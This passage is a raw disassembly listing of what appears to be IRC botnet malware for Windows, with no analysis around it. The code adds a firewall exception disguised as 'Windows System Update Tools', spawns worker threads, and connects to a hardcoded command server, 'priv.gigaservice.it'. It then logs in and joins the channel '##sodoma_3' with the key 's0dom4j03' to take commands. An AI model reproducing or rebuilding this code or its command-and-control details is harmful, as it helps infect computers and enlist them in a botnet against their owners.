jz short loc_40EE26
cmp eax, 5
jnz short loc_40EE49
loc_40EE26: ; CODE XREF: ___:0040EE1F�j
push 3A98h
mov dword ptr [ebp-4], 1
nop
call near ptr 7C802442h
lea eax, [ebp-1ECh]
push ebx
push eax
lea eax, [ebp-2F0h]
push eax
jmp short loc_40EE0B
; ---------------------------------------------------------------------------
loc_40EE49: ; CODE XREF: ___:0040EE0F�j
; ___:0040EE1A�j ...
lea eax, [ebp-1ECh]
push eax
call sub_40AAF1
pop ecx
lea eax, [ebp-1ECh]
push 7
push eax
nop
call near ptr 7C812782h
push 10h
lea eax, [ebp-24h]
push ebx
push eax
call sub_417430
push 44h
lea eax, [ebp-0E8h]
pop edi
push edi
push ebx
push eax
call sub_417430
add esp, 18h
mov [ebp-0E8h], edi
mov dword ptr [ebp-0DCh], offset byte_43C63C
mov [ebp-0B8h], bx
push 1
pop edi
mov [ebp-0BCh], edi
nop
call near ptr 7C809920h
push eax
push edi
push 100000h
nop
call near ptr 7C8309E1h
lea ecx, [ebp-2F0h]
push ecx
push eax
lea eax, [ebp-1ECh]
push eax
lea eax, [ebp-0A90h]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_4173AC
add esp, 14h
lea eax, [ebp-24h]
push eax
lea eax, [ebp-0E8h]
push eax
lea eax, [ebp-3F4h]
push eax
push ebx
push 28h
push edi
push ebx
lea eax, [ebp-0A90h]
push ebx
push eax
lea eax, [ebp-1ECh]
push eax
nop
call near ptr 7C802367h
test eax, eax
jz short loc_40EF36
push 0C8h
nop
call near ptr 7C802442h
push dword ptr [ebp-24h]
mov esi, dword_42107C
call esi ; CloseHandle
push dword ptr [ebp-20h]
call esi ; CloseHandle
call dword_441318 ; WSACleanup
push ebx
nop
call near ptr 7C81CDDAh
loc_40EF33: ; CODE XREF: ___:0040ED74�j
push 1
pop edi
loc_40EF36: ; CODE XREF: ___:0040EF09�j
cmp dword_5158A0, 2
jle short loc_40EF85
mov eax, dword_5158A4
push dword ptr [eax+4]
call sub_41791F
pop ecx
mov [ebp-4], eax
push 0FFFFFFFFh
push eax
nop
call near ptr 7C802520h
push dword ptr [ebp-4]
nop
call near ptr 7C809B47h
mov eax, dword_5158A4
cmp [eax+8], ebx
jz short loc_40EF85
push 7D0h
nop
call near ptr 7C802442h
mov eax, dword_5158A4
push dword ptr [eax+8]
nop
call near ptr 7C831EABh
loc_40EF85: ; CODE XREF: ___:0040EF3D�j
; ___:0040EF6A�j
lea eax, [ebp-3F4h]
push esi
push eax
lea eax, [ebp-5FCh]
push offset aSS_3 ; "%s\\%s"
push eax
call sub_4173AC
add esp, 10h
cmp dword_42ECF4, ebx
jz short loc_40EFBE
cmp dword_441488, ebx
jnz short loc_40EFBE
lea eax, [ebp-4F8h]
push eax
call sub_40C738
pop ecx
loc_40EFBE: ; CODE XREF: ___:0040EFA7�j
; ___:0040EFAF�j
cmp dword_42ED08, ebx
jz short loc_40F039
lea eax, [ebp-5FCh]
push offset aWindowsSystemU ; "Windows System Update Tools"
push eax
push offset aSEnabledS ; "%s:*:Enabled:%s"
lea eax, [ebp-1E8h]
push 100h
push eax
call sub_41792A
add esp, 14h
lea eax, [ebp-4]
push ebx
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call dword_44136C ; RegCreateKeyExA
lea eax, [ebp-1E8h]
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp-1E8h]
push eax
push edi
lea eax, [ebp-5FCh]
push ebx
push eax
push dword ptr [ebp-4]
call dword_4413DC ; RegSetValueExA
push dword ptr [ebp-4]
call dword_441394 ; RegCloseKey
loc_40F039: ; CODE XREF: ___:0040EFC4�j
lea eax, [ebp-0A4h]
push offset dword_434A44
push eax
call sub_4173AC
push ebx
lea eax, [ebp-0A4h]
push ebx
push eax
call sub_416E58
lea eax, [ebp-0A4h]
push eax
call sub_40C4F7
push 0B80h
push ebx
push offset dword_446090
call sub_417430
lea eax, [ebp-0A4h]
push offset unk_434A0C
push eax
call sub_4173AC
push ebx
lea eax, [ebp-0A4h]
push edi
push eax
call sub_416E58
add esp, 38h
mov edi, eax
mov esi, dword_42109C
lea eax, [ebp-8]
push eax
push ebx
push ebx
push offset byte_415ED7
push ebx
push ebx
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_446E24[edi], eax
jnz short loc_40F0D8
nop
call near ptr 7C910331h
push eax
lea eax, [ebp-0A4h]
push offset unk_4349B8
push eax
call sub_4173AC
add esp, 0Ch
loc_40F0D8: ; CODE XREF: ___:0040F0BB�j
lea eax, [ebp-0A4h]
push eax
call sub_40C4F7
lea eax, [ebp-0A4h]
mov dword ptr [esp], offset unk_43497C
push eax
call sub_4173AC
push ebx
lea eax, [ebp-0A4h]
push 1
push eax
call sub_416E58
add esp, 14h
mov edi, eax
lea eax, [ebp-8]
push eax
push ebx
push ebx
push offset dword_416B9C
push ebx
push ebx
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_446E24[edi], eax
jnz short loc_40F145
nop
call near ptr 7C910331h
push eax
lea eax, [ebp-0A4h]
push offset unk_434930
push eax
call sub_4173AC
add esp, 0Ch
loc_40F145: ; CODE XREF: ___:0040F128�j
lea eax, [ebp-0A4h]
push eax
call sub_40C4F7
lea eax, [ebp-0A4h]
mov dword ptr [esp], offset unk_4348F8
push eax
call sub_4173AC
push ebx
lea eax, [ebp-0A4h]
push 1
push eax
call sub_416E58
add esp, 14h
mov edi, eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-4F8h]
push ebx
push eax
push offset dword_40C7A8
push ebx
push ebx
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_446E24[edi], eax
jnz short loc_40F1B8
nop
call near ptr 7C910331h
push eax
lea eax, [ebp-0A4h]
push offset unk_4348AC
push eax
call sub_4173AC
add esp, 0Ch
loc_40F1B8: ; CODE XREF: ___:0040F19B�j
lea eax, [ebp-0A4h]
push eax
call sub_40C4F7
call sub_417408
push 7Fh
push offset aPriv_gigaservi ; "priv.gigaservice.it"
push offset dword_5154CC
mov dword_515650, ebx
call sub_4182F0
mov eax, dword_42ECD8
push 3Fh
mov edi, offset dword_51554C
push offset aSodoma_3 ; "##sodoma_3"
push edi
mov dword_51561C, eax
call sub_4182F0
push 3Fh
mov esi, offset dword_51558C
push offset aS0dom4j03 ; "s0dom4j03"
push esi
call sub_4182F0
add esp, 28h
mov dword_515620, ebx
loc_40F217: ; CODE XREF: ___:0040F2BD�j
; ___:0040F2C8�j ...
mov [ebp-4], ebx
loc_40F21A: ; CODE XREF: ___:0040F271�j
cmp dword_4414A0, ebx
jnz short loc_40F238
lea eax, [ebp-14h]
push ebx
push eax
call dword_4412FC ; InternetGetConnectedState
test eax, eax
jnz short loc_40F238
push 7530h
jmp short loc_40F264
; ---------------------------------------------------------------------------
loc_40F238: ; CODE XREF: ___:0040F220�j
; ___:0040F22F�j
push offset dword_5154C8
mov dword_51564C, ebx
call sub_40F326
cmp eax, 2
mov [ebp-0Ch], eax
jz loc_40F312
cmp dword_51564C, ebx
jz short loc_40F25F
dec dword ptr [ebp-4]
loc_40F25F: ; CODE XREF: ___:0040F25A�j
push 0BB8h
loc_40F264: ; CODE XREF: ___:0040F236�j
nop
call near ptr 7C802442h
inc dword ptr [ebp-4]
cmp dword ptr [ebp-4], 6
jl short loc_40F21A
cmp dword ptr [ebp-0Ch], 2
jz loc_40F312
cmp [ebp-10h], ebx
jz short loc_40F2C2
push 7Fh
push offset aPriv_gigaservi ; "priv.gigaservice.it"
push offset dword_5154CC
call sub_4182F0
mov eax, dword_42ECD8
push 3Fh
push offset aSodoma_3 ; "##sodoma_3"
push edi
mov dword_51561C, eax
call sub_4182F0
push 3Fh
push offset aS0dom4j03 ; "s0dom4j03"
push esi
call sub_4182F0
add esp, 24h
mov [ebp-10h], ebx
jmp loc_40F217
; ---------------------------------------------------------------------------
loc_40F2C2: ; CODE XREF: ___:0040F280�j
cmp byte_51563C, bl
jz loc_40F217
push 7Fh
push offset byte_51563C
push offset dword_5154CC
call sub_4182F0
mov eax, dword_42ECDC
push 3Fh
push offset dword_515640
push edi
mov dword_51561C, eax
call sub_4182F0
push 3Fh
push offset dword_515644
push esi
call sub_4182F0
add esp, 24h
mov dword ptr [ebp-10h], 1
jmp loc_40F217
; ---------------------------------------------------------------------------
loc_40F312: ; CODE XREF: ___:0040F24E�j
; ___:0040F277�j
call sub_417021
loc_40F317: ; CODE XREF: ___:0040ECDC�j
; ___:0040ECEC�j
call dword_441318 ; WSACleanup
loc_40F31D: ; CODE XREF: ___:0040ECCF�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F326 proc near ; CODE XREF: ___:0040F243�p
; DATA XREF: sub_40F6F1+3C0B�o
var_4B4 = byte ptr -4B4h
var_3B0 = byte ptr -3B0h
var_198 = dword ptr -198h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_D0 = byte ptr -0D0h
var_90 = byte ptr -90h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = byte ptr -30h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4B4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 59h
mov esi, eax
pop ecx
lea edi, [ebp+var_194]
xor ebx, ebx
rep movsd
mov [ebp+var_4], ebx
mov dword ptr [eax+160h], 1
loc_40F351: ; CODE XREF: sub_40F326+AB�j
; sub_40F326+21A�j ...
push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_40]
call dword_4413B8 ; ntohs
mov [ebp+var_12], ax
lea eax, [ebp+var_190]
push eax
call sub_40AE95
cmp eax, ebx
pop ecx
mov [ebp+var_10], eax
jz loc_40F55F
push 6
push 1
push 2
call dword_441438 ; socket
mov esi, eax
mov eax, [ebp+var_38]
imul eax, 234h
push 10h
mov dword_446E1C[eax], esi
lea eax, [ebp+var_14]
push eax
push esi
call dword_441360 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40F3D6
push esi
call dword_441450 ; closesocket
call sub_40AEBE
push 7D0h
loc_40F3CB: ; CODE XREF: sub_40F326+22A�j
nop
call near ptr 7C802442h
jmp loc_40F351
; ---------------------------------------------------------------------------
loc_40F3D6: ; CODE XREF: sub_40F326+92�j
push 1Ch
lea eax, [ebp+var_30]
push ebx
push eax
call sub_417430
push ebx
lea eax, [ebp+var_30]
push dword_42ED04
push dword_42ED00
push eax
push esi
call sub_4162D6
push 1Bh
mov [ebp+arg_0], eax
push eax
mov eax, [ebp+var_38]
imul eax, 234h
add eax, offset byte_446E28
push eax
call sub_4182F0
lea eax, [ebp+var_190]
push eax
push offset dword_434B48
call sub_40C56B
add esp, 34h
cmp dword_42ED0C, ebx
jz loc_40F504
call sub_40B051
test eax, eax
jz loc_40F504
lea eax, [ebp+var_4B4]
push 104h
push eax
nop
call near ptr 7C814EEAh
lea eax, [ebp+var_4B4]
push eax
lea eax, [ebp+var_3B0]
push offset aSDriversTcpip_ ; "%s\\drivers\\tcpip.sys"
push eax
call sub_4173AC
lea eax, [ebp+var_3B0]
push eax
call sub_40C127
; ---------------------------------------------------------------------------
dw 0F88Bh
dd 3B10C483h, 81840FFBh, 8D000000h, 0FFFC5085h, 10468FFh
dd 8D500000h, 0FFFD5C85h, 0B58950FFh, 0FFFFFD54h, 0FE649D89h
dd 49E8FFFFh, 5300008Eh, 68216Ah, 8900434Bh, 0FFFE60BDh
dd 799EE8FFh, 0C4830000h, 58858918h, 8DFFFFFDh, 8D50FC45h
dd 0FFFD5485h, 685053FFh, 40B0E7h, 0E8905353h, 7C40115Bh
dd 0FD588D8Bh, 0C969FFFFh, 234h, 8189C33Bh, 446E24h
; ---------------------------------------------------------------------------
jz short loc_40F504
loc_40F4F2: ; CODE XREF: sub_40F326+1DC�j
cmp [ebp+var_198], ebx
jnz short loc_40F504
push 32h
nop
call near ptr 7C802442h
jmp short loc_40F4F2
; ---------------------------------------------------------------------------
loc_40F504: ; CODE XREF: sub_40F326+107�j
; sub_40F326+114�j ...
push [ebp+var_3C]
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_90]
push eax
lea eax, [ebp+var_D0]
push [ebp+var_194]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_110]
push eax
push esi
call sub_40F576
add esp, 20h
mov edi, eax
push esi
call dword_441450 ; closesocket
cmp edi, ebx
jz loc_40F351
cmp edi, 1
jnz short loc_40F555
push 0DBBA0h
jmp loc_40F3CB
; ---------------------------------------------------------------------------
loc_40F555: ; CODE XREF: sub_40F326+223�j
cmp edi, 2
jz short loc_40F563
jmp loc_40F351
; ---------------------------------------------------------------------------
loc_40F55F: ; CODE XREF: sub_40F326+5F�j
xor eax, eax
jmp short loc_40F56F
; ---------------------------------------------------------------------------
loc_40F563: ; CODE XREF: sub_40F326+232�j
push [ebp+var_38]
call sub_417174
pop ecx
push 2
pop eax
loc_40F56F: ; CODE XREF: sub_40F326+23B�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40F326 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F576 proc near ; CODE XREF: sub_40F326+207�p
var_1A0C = byte ptr -1A0Ch
var_A0C = byte ptr -0A0Ch
var_23C = byte ptr -23Ch
var_19C = byte ptr -19Ch
var_9C = byte ptr -9Ch
var_1C = byte ptr -1Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A0Ch
call sub_417B70
push ebx
push esi
push edi
xor ebx, ebx
push 2
mov [ebp+var_8], ebx
lea eax, [ebp+var_19C]
pop ecx
loc_40F594: ; CODE XREF: sub_40F576+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_40F594
cmp byte_515638, bl
jz short loc_40F5BB
push offset byte_515638
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0]
call sub_40DBCA
add esp, 0Ch
loc_40F5BB: ; CODE XREF: sub_40F576+2E�j
push [ebp+arg_C]
lea eax, [ebp+var_1C]
push ebx
push ebx
push 1
push eax
push [ebp+arg_10]
call sub_4162D6
add esp, 14h
push eax
lea eax, [ebp+var_9C]
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_4173AC
add esp, 14h
lea eax, [ebp+var_9C]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_9C]
push eax
push [ebp+arg_0]
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40F628
push [ebp+arg_0]
call dword_441450 ; closesocket
push 1388h
nop
call near ptr 7C802442h
loc_40F621: ; CODE XREF: sub_40F576+DC�j
; sub_40F576+156�j
xor eax, eax
loc_40F623: ; CODE XREF: sub_40F576+176�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40F628: ; CODE XREF: sub_40F576+95�j
; sub_40F576+FB�j ...
mov esi, 1000h
lea eax, [ebp+var_1A0C]
push esi
push ebx
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_1A0C]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_4413D0 ; recv
test eax, eax
jle short loc_40F621
lea eax, [ebp+var_A0C]
push eax
lea eax, [ebp+var_1A0C]
push eax
call sub_40A7DD
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
mov [ebp+arg_10], ebx
jle short loc_40F628
lea edi, [ebp+var_A0C]
loc_40F679: ; CODE XREF: sub_40F576+168�j
push 1
pop esi
loc_40F67C: ; CODE XREF: sub_40F576+147�j
push [ebp+arg_1C]
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_23C]
push eax
lea eax, [ebp+var_19C]
push eax
push [ebp+arg_18]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [edi]
call sub_40F6F1
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_40F6BF
push 7D0h
nop
call near ptr 7C802442h
jmp short loc_40F67C
; ---------------------------------------------------------------------------
loc_40F6BF: ; CODE XREF: sub_40F576+13A�j
cmp esi, 0FFFFFFFDh
jz short loc_40F6E9
cmp esi, 0FFFFFFFEh
jz short loc_40F6E5
cmp esi, 0FFFFFFFFh
jz loc_40F621
inc [ebp+arg_10]
add edi, 4
mov eax, [ebp+arg_10]
cmp eax, [ebp+var_4]
jl short loc_40F679
jmp loc_40F628
; ---------------------------------------------------------------------------
loc_40F6E5: ; CODE XREF: sub_40F576+151�j
push 1
jmp short loc_40F6EB
; ---------------------------------------------------------------------------
loc_40F6E9: ; CODE XREF: sub_40F576+14C�j
push 2
loc_40F6EB: ; CODE XREF: sub_40F576+171�j
pop eax
jmp loc_40F623
sub_40F576 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F6F1 proc near ; CODE XREF: sub_40F576+12D�p
var_15B0 = byte ptr -15B0h
var_11B0 = byte ptr -11B0h
var_FB0 = byte ptr -0FB0h
var_DB0 = byte ptr -0DB0h
var_CB0 = byte ptr -0CB0h
var_CAC = byte ptr -0CACh
var_BAC = byte ptr -0BACh
var_BA8 = byte ptr -0BA8h
var_AA8 = byte ptr -0AA8h
var_A28 = byte ptr -0A28h
var_9C7 = byte ptr -9C7h
var_9C6 = byte ptr -9C6h
var_9C4 = byte ptr -9C4h
var_9C3 = byte ptr -9C3h
var_9BA = byte ptr -9BAh
var_9B8 = byte ptr -9B8h
var_9B6 = byte ptr -9B6h
var_9B5 = byte ptr -9B5h
var_928 = byte ptr -928h
var_90C = dword ptr -90Ch
var_908 = byte ptr -908h
var_804 = dword ptr -804h
var_800 = dword ptr -800h
var_7FC = byte ptr -7FCh
var_7F8 = dword ptr -7F8h
var_7F4 = byte ptr -7F4h
var_7F0 = dword ptr -7F0h
var_7EC = dword ptr -7ECh
var_7E8 = byte ptr -7E8h
var_780 = byte ptr -780h
var_774 = byte ptr -774h
var_770 = dword ptr -770h
var_76C = byte ptr -76Ch
var_768 = byte ptr -768h
var_75C = byte ptr -75Ch
var_710 = dword ptr -710h
var_708 = byte ptr -708h
var_6FC = dword ptr -6FCh
var_6F8 = byte ptr -6F8h
var_6F4 = byte ptr -6F4h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_6E8 = byte ptr -6E8h
var_681 = byte ptr -681h
var_680 = byte ptr -680h
var_678 = byte ptr -678h
var_670 = byte ptr -670h
var_66C = byte ptr -66Ch
var_668 = byte ptr -668h
var_5F8 = byte ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_570 = dword ptr -570h
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
var_55C = byte ptr -55Ch
var_50C = dword ptr -50Ch
var_508 = byte ptr -508h
var_504 = dword ptr -504h
var_500 = byte ptr -500h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = byte ptr -4ECh
var_4C0 = byte ptr -4C0h
var_4A0 = dword ptr -4A0h
var_488 = byte ptr -488h
var_480 = dword ptr -480h
var_47C = dword ptr -47Ch
var_478 = dword ptr -478h
var_474 = dword ptr -474h
var_470 = dword ptr -470h
var_46C = dword ptr -46Ch
var_468 = dword ptr -468h
var_464 = dword ptr -464h
var_460 = dword ptr -460h
var_45C = byte ptr -45Ch
var_458 = byte ptr -458h
var_444 = byte ptr -444h
var_434 = byte ptr -434h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_40C = dword ptr -40Ch
var_408 = byte ptr -408h
var_3FC = byte ptr -3FCh
var_3F8 = byte ptr -3F8h
var_3D8 = byte ptr -3D8h
var_3B4 = byte ptr -3B4h
var_398 = byte ptr -398h
var_388 = byte ptr -388h
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = byte ptr -2F8h
var_2EC = word ptr -2ECh
var_2EA = word ptr -2EAh
var_2E8 = dword ptr -2E8h
var_2DC = byte ptr -2DCh
var_DC = dword ptr -0DCh
var_D8 = byte ptr -0D8h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_54 = byte ptr -54h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 15B0h
call sub_417B70
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
mov [ebp+var_C0], 3
mov [ebp+var_10], ebx
mov [ebp+var_AC], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_DC], ebx
call sub_417430
push 1Bh
lea eax, [ebp+var_928]
push [ebp+arg_10]
push eax
call sub_4182F0
add esp, 18h
cmp [ebp+arg_0], ebx
jz loc_40FAB8
push esi
lea eax, [ebp+var_FB0]
push ebx
push eax
call sub_417430
dec esi
lea eax, [ebp+var_FB0]
push esi
push [ebp+arg_0]
push eax
call sub_4182F0
lea eax, [ebp+var_FB0]
push offset asc_438244 ; " :"
push eax
call sub_417980
mov [ebp+var_C], eax
lea eax, [ebp+var_FB0]
push esi
push eax
lea eax, [ebp+var_11B0]
push eax
call sub_4182F0
mov esi, offset asc_428300 ; " "
lea eax, [ebp+var_11B0]
push esi
push eax
call sub_41824D
add esp, 34h
mov [ebp+var_94], eax
lea edi, [ebp+var_90]
mov [ebp+var_BC], 1Fh
loc_40F7C4: ; CODE XREF: sub_40F6F1+E7�j
push esi
push ebx
call sub_41824D
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+var_BC]
pop ecx
jnz short loc_40F7C4
mov esi, [ebp+var_94]
cmp esi, ebx
jz loc_40FAB8
cmp [ebp+var_90], ebx
jz loc_40FAB8
push 100h
lea eax, [ebp+var_A28]
push ebx
push eax
call sub_417430
add esp, 0Ch
lea ecx, [ebp+var_18]
push 1Fh
pop edx
push 1
pop edi
loc_40F812: ; CODE XREF: sub_40F6F1+153�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_40F83E
cmp byte ptr [eax], 2Dh
jnz short loc_40F846
cmp [eax+2], bl
jnz short loc_40F846
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_A28], 1
mov esi, [ebp+var_94]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_40F83E: ; CODE XREF: sub_40F6F1+125�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_40F812
loc_40F846: ; CODE XREF: sub_40F6F1+12A�j
; sub_40F6F1+12F�j
cmp [ebp+var_9B5], bl
jz short loc_40F851
mov [ebp+var_8], edi
loc_40F851: ; CODE XREF: sub_40F6F1+15B�j
cmp [ebp+var_9BA], bl
jz short loc_40F85F
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_40F85F: ; CODE XREF: sub_40F6F1+166�j
cmp byte ptr [esi], 0Ah
jz short loc_40F899
push 7Fh
lea eax, [ebp+var_AA8]
push esi
push eax
call sub_4182F0
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp+var_D8]
push eax
call sub_4182F0
lea eax, [ebp+var_D8]
push offset asc_438240 ; "!"
push eax
call sub_41824D
add esp, 20h
loc_40F899: ; CODE XREF: sub_40F6F1+171�j
push esi
push offset aPing ; "PING"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F8EA
push [ebp+var_90]
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_40DBCA
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_40F991
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40DBCA
add esp, 10h
jmp loc_40F991
; ---------------------------------------------------------------------------
loc_40F8EA: ; CODE XREF: sub_40F6F1+1B7�j
mov esi, [ebp+var_90]
push esi
push offset a001 ; "001"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415AE2
push esi
push offset a005 ; "005"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415AE2
push esi
push offset a302_0 ; "302"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F955
push offset a@ ; "@"
push [ebp+var_88]
call sub_417980
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40F991
inc eax
push 9Fh
push eax
push [ebp+arg_1C]
call sub_4182F0
add esp, 0Ch
jmp short loc_40F991
; ---------------------------------------------------------------------------
loc_40F955: ; CODE XREF: sub_40F6F1+238�j
push esi
push offset a433 ; "433"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F998
push ebx
push dword_42ED04
push dword_42ED00
push [ebp+arg_10]
push [ebp+arg_4]
call sub_4162D6
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_40DBCA
add esp, 20h
loc_40F991: ; CODE XREF: sub_40F6F1+1D8�j
; sub_40F6F1+1F4�j ...
mov eax, edi
jmp loc_40FABB
; ---------------------------------------------------------------------------
loc_40F998: ; CODE XREF: sub_40F6F1+273�j
mov esi, [ebp+arg_18]
mov [ebp+var_BC], 2
mov edi, 80h
loc_40F9AA: ; CODE XREF: sub_40F6F1+2DE�j
lea eax, [ebp+var_AA8]
push eax
push esi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F9C7
mov [ebp+var_AC], 1
loc_40F9C7: ; CODE XREF: sub_40F6F1+2CA�j
add esi, edi
dec [ebp+var_BC]
jnz short loc_40F9AA
mov esi, [ebp+var_90]
push esi
push offset aKick ; "KICK"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_40FAC0
mov esi, [ebp+arg_18]
mov [ebp+arg_24], 2
loc_40F9F6: ; CODE XREF: sub_40F6F1+392�j
cmp [esi], bl
jz loc_40FA7E
push 7Fh
lea eax, [ebp+var_AA8]
push esi
push eax
call sub_4182F0
lea eax, [ebp+var_D8]
add esp, 0Ch
test eax, eax
jz short loc_40FA7E
cmp [ebp+var_88], ebx
jz short loc_40FA7E
push [ebp+var_88]
lea eax, [ebp+var_D8]
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FA7E
lea eax, [ebp+var_D8]
mov [esi], bl
push eax
lea eax, [ebp+var_2DC]
push offset dword_4381C4
push eax
call sub_4173AC
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_40DBCA
lea eax, [ebp+var_2DC]
push eax
call sub_40C4F7
add esp, 20h
loc_40FA7E: ; CODE XREF: sub_40F6F1+307�j
; sub_40F6F1+327�j ...
add esi, edi
dec [ebp+arg_24]
jnz loc_40F9F6
push [ebp+var_88]
push [ebp+arg_10]
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FAB8
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8]
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_40FAAD: ; CODE XREF: sub_40F6F1+618�j
; sub_40F6F1+96F�j
push [ebp+arg_4]
call sub_40DBCA
loc_40FAB5: ; CODE XREF: sub_40F6F1+5904�j
; sub_40F6F1+591F�j ...
add esp, 10h
loc_40FAB8: ; CODE XREF: sub_40F6F1+5B�j
; sub_40F6F1+F1�j ...
push 1
loc_40FABA: ; CODE XREF: sub_40F6F1+5E29�j
pop eax
loc_40FABB: ; CODE XREF: sub_40F6F1+2A2�j
; sub_40F6F1+2375�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
